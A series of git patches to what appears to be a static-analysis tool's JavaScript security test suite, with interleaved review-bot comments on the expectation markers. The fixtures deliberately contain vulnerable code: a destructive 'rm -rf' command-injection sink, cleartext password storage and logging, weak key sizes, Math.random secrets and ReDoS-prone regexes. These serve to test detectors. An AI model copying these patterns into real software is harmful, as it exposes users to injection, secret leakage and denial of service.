@@ -19,7 +19,7 @@ function cla() { } cla.prototype.method = function (name) { cp.exec("rm -rf " + name); // $ Alert } -module.exports = new cla(); +module.exports.cla = new cla(); function cla2() { } @@ -474,7 +474,7 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports = function check(config) { +module.exports.check = function check(config) { const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } From b54ff3b5b3cdf56249e98e9225f1c81f73f60579 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:31:52 +0100 Subject: [PATCH 076/892] JS: Accept an alert --- .../ql/test/query-tests/Security/CWE-312/CleartextStorage2.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js b/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js index 88385a96ab49..ba26d5bc18e3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js @@ -4,7 +4,7 @@ var url = require('url'); var server = https.createServer(function(req, res) { let pw = url.parse(req.url, true).query.current_password; res.writeHead(200, { - 'Set-Cookie': 'password=' + pw, + 'Set-Cookie': 'password=' + pw, // $ Alert[js/clear-text-storage-of-sensitive-data] 'Content-Type': 'text/plain' }); }); From e91a046a17a35aa11adbc8760659f53346ffbeae Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:33:17 +0100 Subject: [PATCH 077/892] JS: Mark a spurious alert --- javascript/ql/test/query-tests/Security/CWE-312/passwords.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js index 686f3d3f4282..af3f1a268a48 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js @@ -75,7 +75,7 @@ console.log(config); var temp = { encryptedPassword: req.body.password }; - console.log(temp.encryptedPassword); // OK - XXX + console.log(temp.encryptedPassword); // $ SPURIOUS: Alert[js/clear-text-logging] var secret = password; console.log(`pw: ${secret}`); // $ Alert[js/clear-text-logging] From 51b45598c4682a2158e8a56d96dcf74871ec3a85 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:33:35 +0100 Subject: [PATCH 078/892] JS: Move an alert and add query ID --- .../ql/test/query-tests/Security/CWE-312/passwords.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js index af3f1a268a48..73170197965f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js @@ -139,19 +139,19 @@ }); function indirectLogCall() { - console.log.apply(this, arguments); + console.log.apply(this, arguments); // $ Alert[js/clear-text-logging] } var Util = require('util'); (function() { var config = { x: password }; - indirectLogCall(config.x); // $ Alert - indirectLogCall(process.env); // $ Alert + indirectLogCall(config.x); + indirectLogCall(process.env); var procdesc = Util.inspect(process.env).replace(/\n/g, '') - indirectLogCall(procdesc); // $ Alert + indirectLogCall(procdesc); console.log(process.env); // $ Alert[js/clear-text-logging] console.log(process.env.PATH); From fc9570234184d86394f66418b31b95f329c27719 Mon Sep 17 00:00:00 2001 
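Review bot: The new `// $ SPURIOUS: Alert[js/clear-text-logging]` on `console.log(temp.encryptedPassword)` gives no reason, and the object literal just above stores `req.body.password` unchanged under that property. As written, a reader cannot tell whether the test expects the property name `encryptedPassword` to suppress the alert, or whether the alert is arguably correct because the logged value is the raw request password. I would state the rationale after the marker, e.g. `// $ SPURIOUS: Alert[js/clear-text-logging] - property name indicates the value is encrypted`, or drop `SPURIOUS` if the flow is considered a true positive.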
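Review bot: Moving the expectation to `console.log.apply(this, arguments)` collapses three distinct flows (`config.x`, `process.env`, `procdesc`) into a single `Alert[js/clear-text-logging]` marker at the sink. If one or two of those flows stopped being detected, this marker would still match and the regression would not show up in the inline expectations. If the harness in use accepts source markers, keep one on each call, e.g. `indirectLogCall(config.x); // $ Source[js/clear-text-logging]`.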
From: Asger F Date: Wed, 12 Feb 2025 15:34:07 +0100 Subject: [PATCH 079/892] JS: Accept some more alerts from CleartextStorage --- .../query-tests/Security/CWE-312/passwords_in_server_1.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_2.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_3.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_4.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_5.js | 2 +- .../test/query-tests/Security/CWE-312/tst-webstorage.js | 8 ++++---- 6 files changed, 9 insertions(+), 9 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js index 50caa0584aa5..b2cabbc9944f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js @@ -3,4 +3,4 @@ var app = express(); app.get('/some/path', function() { }) -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js index a59e8bba77fa..94fd757c33ce 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js @@ -1,3 +1,3 @@ require("foo"); (function (req, res){}); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js index ea6132502372..118ae5dd2a75 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js 
@@ -1,2 +1,2 @@ var server = require("./server"); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js index 53279ea2853a..c47deadde58a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js @@ -1,2 +1,2 @@ require("foo"); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js index 6070f3d1aebb..d5bb42d5dd07 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js @@ -5,5 +5,5 @@ app.get('/some/path', function() { }) function f(x) { - console.log(x); + console.log(x); // $ Alert[js/clear-text-logging] } diff --git a/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js b/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js index d6adb2fbb75b..43c9e0423e36 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js @@ -1,4 +1,4 @@ -localStorage.x = data.password; -localStorage.setItem('x', data.password) -sessionStorage.x = data.password; -sessionStorage.setItem('x', data.password) +localStorage.x = data.password; // $ Alert[js/clear-text-storage-of-sensitive-data] +localStorage.setItem('x', data.password) // $ Alert[js/clear-text-storage-of-sensitive-data] +sessionStorage.x = data.password; // $ Alert[js/clear-text-storage-of-sensitive-data] +sessionStorage.setItem('x', data.password) // $ Alert[js/clear-text-storage-of-sensitive-data] 
From 0f8e85fa2fa1a961c8b15f8dcb4c8f43babd4b81 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:36:10 +0100 Subject: [PATCH 080/892] JS: Accept alerts for InsufficientKeySize --- javascript/ql/test/query-tests/Security/CWE-326/tst.js | 2 +- javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-326/tst.js b/javascript/ql/test/query-tests/Security/CWE-326/tst.js index 3f636a97e966..839d4fcfc816 100644 --- a/javascript/ql/test/query-tests/Security/CWE-326/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-326/tst.js @@ -32,7 +32,7 @@ var bad9 = forge.cipher.createDecipher('3DES-CBC', key3); // $ Alert var key4 = myBuffer.getBytes(16); var good5 = forge.cipher.createDecipher('AES-CBC', key4); -var bad10 = crypto.createDiffieHellman(512); +var bad10 = crypto.createDiffieHellman(512); // $ Alert var good6 = crypto.createDiffieHellman(2048); const NodeRSA = require('node-rsa'); diff --git a/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs b/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs index d5e5051af668..1db03f450491 100644 --- a/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs +++ b/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs @@ -1,5 +1,5 @@ const crypto = $.require("crypto"); -const bad1 = crypto.generateKeyPairSync("rsa", { modulusLength: 1024 }); // NOT OK +const bad1 = crypto.generateKeyPairSync("rsa", { modulusLength: 1024 }); // $ Alert const good1 = crypto.generateKeyPairSync("rsa", { modulusLength: 4096 }); // OK From 92c39394576da5a363f9256e6020e181566a6284 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 18 Feb 2025 13:19:37 +0100 Subject: [PATCH 081/892] JS: Accept InsecureRandomness alerts --- javascript/ql/test/query-tests/Security/CWE-338/tst.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) 
diff --git a/javascript/ql/test/query-tests/Security/CWE-338/tst.js b/javascript/ql/test/query-tests/Security/CWE-338/tst.js index d8d0c1adcb74..d22bcc5d6df2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-338/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-338/tst.js @@ -87,12 +87,12 @@ function f17() { } function f18() { - var secret = (o.password = Math.random()); + var secret = (o.password = Math.random()); // $ Alert } (function(){ var crypto = require('crypto'); - crypto.createHmac('sha256', Math.random()); + crypto.createHmac('sha256', Math.random()); // $ Alert })(); (function () { @@ -118,7 +118,7 @@ function uid() { var my_nice_uid = Math.floor(Math.random() * 4_000_000_000); // $ Alert var liquid = Math.random(); var UUID = Math.random(); // $ Alert - var MY_UID = Math.random(); // NOK OK + var MY_UID = Math.random(); // $ Alert } function buildPass(opts, length) { @@ -136,4 +136,4 @@ function buildPass(opts, length) { password += chars[Math.floor(Math.random() * chars.length)]; // $ Alert } return password; -} \ No newline at end of file +} From 283b14207dfb82901dcb198505411d07f0461bf3 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:18:56 +0100 Subject: [PATCH 082/892] JS: Accept some ReDoS alerts --- .../Security/CWE-400/ReDoS/highlight.js | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js index f12d49ba07ae..7677dad3f53d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js 
@@ -1,39 +1,39 @@ // routeros -var bad = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firewall|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; +var bad = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firewall|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; 
// $ Alert[js/redos] var good = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; // powershell -var bad = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|New|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; +var bad = 
/(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|New|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; // $ Alert[js/redos] var good = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; // perl -var bad = /(s|tr|y)\/(\\.|[^/])*\/(\\.|[^/])*\/[a-z]*/m; +var bad = /(s|tr|y)\/(\\.|[^/])*\/(\\.|[^/])*\/[a-z]*/m; // $ Alert[js/redos] var good = /(s|tr|y)\/(\\.|[^\\\/])*\/(\\.|[^\\\/])*\/[dualxmsipn]{0,12}/m; // gams -var bad = /([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/; +var bad = /([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/; // $ Alert[js/redos] var good = /[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+([ ]+[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)*/im; // handlebars -var bad = /('.*?'|".*?"|\[.*?\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+|\.|\/)+X/; +var bad = 
/('.*?'|".*?"|\[.*?\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+|\.|\/)+X/; // $ Alert[js/redos] var good = /(\.|\.\/|\/)?(""|"[^"]+"|''|'[^']+'|\[\]|\[[^\]]+\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+)((\.|\/)(""|"[^"]+"|''|'[^']+'|\[\]|\[[^\]]+\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+))*/im; // c-like -var bad = /((decltype\(auto\)|(?:[a-zA-Z_]\w*::)?[a-zA-Z_]\w*(?:<.*?>)?)[\*&\s]+)+(?:[a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; +var bad = /((decltype\(auto\)|(?:[a-zA-Z_]\w*::)?[a-zA-Z_]\w*(?:<.*?>)?)[\*&\s]+)+(?:[a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; // $ Alert[js/redos] var good = /((decltype\(auto\)|([a-zA-Z_]\w*::)?[a-zA-Z_]\w*(<[^<>]+>)?)[\*&\s]+)+([a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; // jboss-cli -var bad = /\B(([\/.])[\w\-.\/=]+)+X/; +var bad = /\B(([\/.])[\w\-.\/=]+)+X/; // $ Alert[js/redos] var good = /\B([\/.])[\w\-.\/=]+X/; // r -var bad = /`(?:\\.|[^`])+`/m; +var bad = /`(?:\\.|[^`])+`/m; // $ Alert[js/redos] var good = /`(?:\\.|[^`\\])+`/; // erlang-repl -var bad = /\?(::)?([A-Z]\w*(::)?)+X/; +var bad = /\?(::)?([A-Z]\w*(::)?)+X/; // $ Alert[js/redos] var good = /\?(::)?([A-Z]\w*)((::)[A-Z]\w*)*X/; // javascript -var bad = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\))*[^()]*\))*[^()]*\)\s*\{/m; +var bad = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\))*[^()]*\))*[^()]*\)\s*\{/m; // $ Alert[js/redos] var good = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\)[^()]*)*\)[^()]*)*\)\s*\{/m; From d298d8740f8fdc93b237843a4fd877cb7c191f37 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:29:38 +0100 Subject: [PATCH 083/892] JS: Accept some exponenital redos alerts in the polynomial redos test suite --- .../query-tests/Security/CWE-400/ReDoS/polynomial-redos.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js index 30b64fd37a8c..95e58d2f060c 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js @@ -14,7 +14,7 @@ app.use(function(req, res) { tainted.replace(/^.*\./, ''); tainted.replace(/^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/); // $ Alert[js/polynomial-redos] tainted.replace(/^(`+)([\s\S]*?[^`])\1(?!`)/); // $ Alert[js/polynomial-redos] - /^(.*,)+(.+)?$/.test(tainted); // $ Alert[js/polynomial-redos] + /^(.*,)+(.+)?$/.test(tainted); // $ Alert[js/polynomial-redos] Alert[js/redos] tainted.match(/[0-9]*['a-z\u00A0-\u05FF\u0700-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]+|[\u0600-\u06FF\/]+(\s*?[\u0600-\u06FF]+){1,2}/i); // $ Alert[js/polynomial-redos] tainted.match(/[0-9]*['a-z\u00A0-\u05FF\u0700-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]{1,256}|[\u0600-\u06FF\/]{1,256}(\s*?[\u0600-\u06FF]{1,256}){1,2}/i); // $ Alert[js/polynomial-redos] - even though it is a proposed fix for the above tainted.match(/^(\+|-)?(\d+|(\d*\.\d*))?(E|e)?([-+])?(\d+)?$/); // $ Alert[js/polynomial-redos] 
@@ -38,12 +38,12 @@ app.use(function(req, res) { tainted.match(/<.*href="([^"]+)".*>/); // $ Alert[js/polynomial-redos] tainted.match(/^([^-]+)-([A-Za-z0-9+/]+(?:=?=?))([?\x21-\x7E]*)$/); // $ Alert[js/polynomial-redos] - tainted.match(/^([^-]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)*$/); // $ Alert - it is a fix for the above, but it introduces exponential complexity elsewhere + tainted.match(/^([^-]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)*$/); // $ Alert[js/redos] - it is a fix for the above, but it introduces exponential complexity elsewhere tainted.match(/^([a-z0-9-]+)[ \t]+([a-zA-Z0-9+\/]+[=]*)([\n \t]+([^\n]+))?$/); // $ Alert[js/polynomial-redos] tainted.match(/^([a-z0-9-]+)[ \t]+([a-zA-Z0-9+\/]+[=]*)([ \t]+([^ \t][^\n]*[\n]*)?)?$/); - tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/); // $ Alert - also flagged by js/redos + tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/); // $ Alert[js/redos] - also flagged by js/redos tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)(?:\.[a-zA-Z_][a-zA-Z_0-9]*)*$/); tainted.replaceAll(/\s*\n\s*/g, ' '); // $ Alert[js/polynomial-redos] From 51fb3dad74da0f851d2dd3c2034723bbb58cb23d Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:31:10 +0100 Subject: [PATCH 084/892] JS: Accept ReDoS alerts in regexplib --- .../CWE-400/ReDoS/regexplib/address.js | 4 ++-- .../Security/CWE-400/ReDoS/regexplib/dates.js | 2 +- .../Security/CWE-400/ReDoS/regexplib/email.js | 16 +++++++-------- .../CWE-400/ReDoS/regexplib/markup.js | 20 +++++++++---------- .../Security/CWE-400/ReDoS/regexplib/misc.js | 18 ++++++++--------- .../CWE-400/ReDoS/regexplib/strings.js | 12 +++++------ .../Security/CWE-400/ReDoS/regexplib/uri.js | 12 +++++------ 7 files changed, 42 insertions(+), 42 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js index ba005a21fdef..d22023d27dd0 100644 
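Review bot: On the `/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/` line the marker becomes `// $ Alert[js/redos] - also flagged by js/redos`, so the trailing text repeats the tag and no longer says which other query it refers to. The first hunk of this file lists both IDs explicitly (`Alert[js/polynomial-redos] Alert[js/redos]`). If this line is still reported by js/polynomial-redos it should use the same form; otherwise the trailing comment should be dropped. The same question applies to the `{44,88}` line above it, where the untagged `Alert` was narrowed to `js/redos` only.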
--- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js 
@@ -48,7 +48,7 @@ /^(\d{2}-\d{2})*$/g; /^(\d{3}-\d{3}-\d{4})*$/g; /^\d{5}((\-|\s)?\d{4})?$/g; -/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; 
+/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; // $ Alert[js/redos] /[0-9]{4}\s*[a-zA-Z]{2}/g; /(^0.*[1-9]*)|(^860+)|(^8613)|(\D)|([0-9])/g; /(077|078|079)\s?\d{2}\s?\d{6}/g; 
